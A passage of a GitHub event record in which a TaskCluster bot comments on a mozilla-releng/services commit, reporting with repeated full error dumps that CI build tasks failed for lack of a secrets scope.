{"id":"4608444594","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145898,"position":null,"line":null,"path":null,"commit_id":"ddcbdbb99491947b6efdcebed5392debf43921f2","created_at":"2016-09-23T13:09:04Z","updated_at":"2016-09-23T13:09:04Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AbZgt-F0S6OFO4EfveG8ww\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.856Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.856Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.856Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.056Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AbZgt-F0S6OFO4EfveG8ww\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.856Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.856Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.856Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.056Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"AbZgt-F0S6OFO4EfveG8ww\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:01.856Z\",\n                    \"deadline\": \"2016-09-24T13:09:01.856Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DfNtv5WrSHK3wLJy5Vvp3g\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:01.856Z\"\n                },\n                \"time\": \"2016-09-23T13:09:02.056Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"SXjDQ9n_QIq_bL6htruYCw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.852Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.852Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.852Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.050Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"SXjDQ9n_QIq_bL6htruYCw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.852Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.852Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.852Z\\\"\\n}\\n  time:     2016-09-23T13:09:02.050Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"SXjDQ9n_QIq_bL6htruYCw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:01.852Z\",\n                    \"deadline\": \"2016-09-24T13:09:01.852Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DfNtv5WrSHK3wLJy5Vvp3g\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:01.852Z\"\n                },\n                \"time\": \"2016-09-23T13:09:02.050Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"N0KLxoW3TQuhngoPjfCs6Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": 